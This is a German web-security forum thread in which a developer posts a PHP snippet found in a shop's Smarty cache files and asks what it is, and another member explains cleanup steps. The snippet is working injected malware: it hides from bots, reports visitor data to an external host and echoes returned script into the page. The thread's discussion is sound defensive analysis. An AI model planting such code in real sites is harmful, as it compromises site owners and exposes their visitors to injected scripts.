Zurück   Trojaner-Board > Web/PC > Alles rund um Mac OSX & Linux

Alles rund um Mac OSX & Linux: Schadsoftware auf Webserver (PHP)

Windows 7 Für alle Fragen rund um Mac OSX, Linux und andere Unix-Derivate.

Antwort
Alt 13.05.2014, 15:29   #1
ShopNix
 
Schadsoftware auf Webserver (PHP) - Standard

Schadsoftware auf Webserver (PHP)



Auf einem Webserver fand ich folgenden Schadcode:

PHP-Code:
#c18fce#
error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER['HTTP_USER_AGENT'];
if (( 
preg_match ('/Gecko|MSIE/i'$wp_j6451) && !preg_match ('/bot/i'$wp_j6451))){
$wp_j096451="hxxp://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_j6451);
$ch curl_init(); curl_setopt ($chCURLOPT_URL,$wp_j096451);
curl_setopt ($chCURLOPT_TIMEOUT6); curl_setopt($chCURLOPT_RETURNTRANSFER1); $wp_6451j curl_exec ($ch); curl_close($ch);}
if ( 
substr($wp_6451j,1,3) === 'scr' ){ echo $wp_6451j; }
#/c18fce# 
Falls jemand eine Ahnung hat, was das ist, ob es in Zusammenhang mit anderen Schweinereien auftritt, und ob ich nun alles auf den Kopf stellen muss, wäre ich für zweckdienliche Hinweise dankbar.

Die Sache fiel auf, weil das obige Snippet mangels Empfänger nicht mehr nach Hause telefonieren konnte. Die dadurch entstehende Verzögerung führte zu Ladezeiten von 2-3 Minuten statt der üblichen 5-10 Sekunden.

Der Codeblock war mit unterschiedlichen Kommentaren in allen Smarty-Cachefiles eines xt:Commerce-Shops enthalten.

Hinweis: Ich betreibe derlei Geschichten gewerblich, habe mir die Hinweise für neue Postings durchgelesen, kann aber als reiner Linux-User die angegebenen Programme nicht betreiben und infolgedessen auch die gewünschten Logs nicht liefern.

Falls ich als Neuling hierzuforum etwas übersehen haben sollte, nehme ich auch dazu Hinweise entgegen. Danke.

Alt 23.05.2014, 14:00   #2
Alois S
 
Schadsoftware auf Webserver (PHP) - Standard

Schadsoftware auf Webserver (PHP)



Hallo ShopNix und ,

nun, hier handelt es sich eindeutig um Schadcode!

Die Vorgangsweise in solchen Fällen dürfte ja bekannt sein:

1) Backup der vorhandenen Dateien machen zu späteren Analysezwecken

2) Löschen des gesamten Webspace und Restore einer sauberen Installation durchführen

3) Alle Kennwörter ändern

4) Rücksprache mit Provider/Hoster wegen der Infektion anderer Websites


Liebe Grüße, Alois

Post © Alois 2014 – Alle Rechte vorbehalten – kein Teil darf in irgendeiner Form ohne schriftliche Genehmigung des Autors kritisiert werden!
__________________

__________________

Alt 23.05.2014, 14:17   #3
ShopNix
 
Schadsoftware auf Webserver (PHP) - Standard

Schadsoftware auf Webserver (PHP)



Hallo Alois,

vielen Dank für den Willkommensgruß.

Die Standard-Vorgehensweise hilft mir an der Stelle leider nicht weiter, denn die eigentliche Infektion des Webspace liegt nach Angaben des Betreibers schon längere Zeit zurück. Demnach wurde der Webspace gesäubert und alles war gut.

Ich weiß leider auch nicht, was da alles installiert ist, sondern habe mich ausschließlich um die bemängelten Ladezeiten gekümmert und dabei den o. a. Schadcode entdeckt.

Was ich fand, ist wohl nur ein Überbleibsel, und ich hätte gern daraus auf die Ursache zurückgeschlossen um eventuell bekannte Zusammenhänge nachzuverfolgen.

Für den Shop ist das kein Thema, da erfolgt eine komplette Neuinstallation zum Zwecke der Migration auf aktuellen Softwarestand. Sorgen machen mir die weiteren Komponenten auf der Website, die ich nicht kenne, und für die ich keinen Auftrag habe.
__________________

Alt 23.05.2014, 14:27   #4
Alois S
 
Schadsoftware auf Webserver (PHP) - Standard

Schadsoftware auf Webserver (PHP)



Gern geschehen!

Zitat:
Sorgen machen mir die weiteren Komponenten auf der Website, die ich nicht kenne, und für die ich keinen Auftrag habe.
Nun, da hilft eigentlich nur eine Rück- und/oder "Aussprache" mit dem betreffenden Hoster - sorry, dass ich nicht mehr dazu sagen kann, aber eine "Eigenanalyse" ist hier weder empfehlenswert noch möglich (ist ja nicht deine Seite, oder?)

Liebe Grüße, Alois
__________________
Post © Alois 2015 – Alle Rechte vorbehalten – kein Teil darf in irgendeiner Form ohne schriftliche Genehmigung des Autors kritisiert werden!

Alt 23.05.2014, 14:41   #5
ShopNix
 
Schadsoftware auf Webserver (PHP) - Standard

Schadsoftware auf Webserver (PHP)



Der Hoster will nicht mit mir schwätzen, weil ich nicht sein Kunde bin, der Betreiber versteht anscheinend nicht, wovon ich rede und ich habe keine große Lust, mich mit Ignoranten herumzuschlagen.

Also dachte ich, ich poste das Ding mal an qualifizierter Stelle. Wenn mir jemand zweckdienliche Hinweise geben kann, dann verfolge ich die, andernfalls wasche im meine Hände in Unschuld.


Alt 23.05.2014, 14:56   #6
Alois S
 
Schadsoftware auf Webserver (PHP) - Standard

Schadsoftware auf Webserver (PHP)



Hallo ShopNix,

nun, da der bzw. die Hacker ihren Server ja inzwischen abgeschaltet haben (wenn ich dich richtig verstanden habe) - was soll´s ?

EDIT: Übrigens ist der Code recht raffiniert geschrieben - das Schadscript wird nur bei herkömmlichen Browsern und nicht bei Bots ausgeführt und an einem Block ist auch deutlich zu erkennen, dass die "Verseuchung" gelungen ist.....

Liebe Grüße, Alois
__________________
--> Schadsoftware auf Webserver (PHP)

Geändert von Alois S (23.05.2014 um 15:19 Uhr) Grund: siehe "EDIT"

Antwort

Themen zu Schadsoftware auf Webserver (PHP)
agent, ahnung, andere, anderen, errors, folge, folgende, geschichte, hinweise, minute, minuten, neue, neuling, nicht mehr, postings, programme, remote, sache, scr, stehe, stelle, telefonieren, transfer, verzögerung, zweckdienliche



Ähnliche Themen: Schadsoftware auf Webserver (PHP)


  1. Fünf Lücken im Apache-Webserver geschlossen
    Nachrichten - 18.07.2014 (0)
  2. Virus auf Webserver möglich?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2014 (3)
  3. JS/EXP.Redir.EL.7 auf Webserver - wie vorgehen?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2013 (1)
  4. Kritische Lücke im Webserver nginx
    Nachrichten - 07.05.2013 (0)
  5. Geknackte Webserver als Malware-Schleudern
    Nachrichten - 06.03.2013 (0)
  6. Schadstoffcode iauf meinem Webserver
    Diskussionsforum - 27.01.2013 (18)
  7. Webserver infiziert? Malware globalconferencemanagementgroup.com
    Plagegeister aller Art und deren Bekämpfung - 02.01.2013 (3)
  8. Rootkit befällt Linux-Webserver
    Nachrichten - 20.11.2012 (0)
  9. Sicherheitslücke auf Webserver der Schufa
    Nachrichten - 12.06.2011 (0)
  10. Webserver der Bundesfinanzagentur offen wie ein Scheunentor
    Nachrichten - 11.03.2011 (0)
  11. Apache Webserver Online bringen
    Alles rund um Windows - 24.01.2011 (10)
  12. JS:Illredir-W auf Webserver
    Plagegeister aller Art und deren Bekämpfung - 24.02.2010 (1)
  13. JS:Redirect-AM[Trj] auf Webserver von Versatel ohne php, css und js
    Plagegeister aller Art und deren Bekämpfung - 10.01.2010 (1)
  14. lokaler webserver? trojaner? dienst?
    Plagegeister aller Art und deren Bekämpfung - 11.03.2009 (1)
  15. Webserver -> Trojaner
    Plagegeister aller Art und deren Bekämpfung - 19.10.2008 (1)
  16. Trojaner auf dem Webserver
    Plagegeister aller Art und deren Bekämpfung - 14.01.2008 (2)
  17. Gentoo vs Debian auf einem Webserver
    Alles rund um Mac OSX & Linux - 16.12.2003 (20)

Zum Thema Schadsoftware auf Webserver (PHP) - Auf einem Webserver fand ich folgenden Schadcode: PHP-Code: #c18fce# error_reporting ( 0 );  ini_set ( 'display_errors' , 0 );  $wp_j6451  = @ $_SERVER [ 'HTTP_USER_AGENT' ]; if ((  preg_match  ( '/Gecko|MSIE/i' ,  - Schadsoftware auf Webserver (PHP)...
Archiv
Du betrachtest: Schadsoftware auf Webserver (PHP) auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.